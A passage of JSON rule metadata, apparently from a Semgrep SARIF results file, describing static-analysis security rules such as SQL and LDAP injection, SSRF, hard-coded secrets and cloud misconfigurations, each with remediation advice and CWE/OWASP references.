to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges)\n - [https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges","id":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","name":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.no-new-privileges.no-new-privileges"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"help":{"markdown":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","id":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","name":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","id":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","name":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","id":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","name":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"help":{"markdown":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)\n","text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","id":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","name":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"help":{"markdown":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0)\n - [https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html](https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html)\n","text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","id":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","name":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"help":{"markdown":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n","text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"helpUri":"https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","id":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","name":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","properties":{"precision":"very-high","tags":["CWE-35: Path Traversal","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","id":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","name":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"help":{"markdown":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version)\n - [https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version](https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version)\n","text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","id":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","name":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url","id":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","name":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-url.pg-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Function sweepToken is allowed to be called by anyone"},"help":{"markdown":"Function sweepToken is allowed to be called by anyone\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted)\n - [https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2](https://medium.com/chainsecurity/trueusd-compound-vulnerability-bc5b696d29e2)\n - [https://chainsecurity.com/security-audit/compound-ctoken/](https://chainsecurity.com/security-audit/compound-ctoken/)\n - [https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/](https://blog.openzeppelin.com/compound-comprehensive-protocol-audit/)\n - [https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f](https://etherscan.io/address/0xa035b9e130f2b1aedc733eefb1c67ba4c503491f)\n","text":"Function sweepToken is allowed to be called by anyone"},"helpUri":"https://semgrep.dev/r/solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","id":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","name":"solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.compound-sweeptoken-not-restricted.compound-sweeptoken-not-restricted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.spring.xpath.tainted-xpath.tainted-xpath","id":"java.spring.xpath.tainted-xpath.tainted-xpath","name":"java.spring.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","id":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","name":"python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.sqlalchemy-fastapi.sqlalchemy-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","id":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","name":"java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep.tainted-ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"You should probably use Filename.get_temp_dirname()."},"help":{"markdown":"You should probably use Filename.get_temp_dirname().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string)\n","text":"You should probably use Filename.get_temp_dirname()."},"helpUri":"https://semgrep.dev/r/ocaml.lang.portability.slash-tmp.not-portable-tmp-string","id":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","name":"ocaml.lang.portability.slash-tmp.not-portable-tmp-string","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: ocaml.lang.portability.slash-tmp.not-portable-tmp-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","id":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","name":"ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.audit.jwt-decode-without-verify.ruby-jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","id":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","name":"csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.jwt-dotnet.jwt-dotnet-hardcoded-secret.jwt-dotnet-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"help":{"markdown":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit 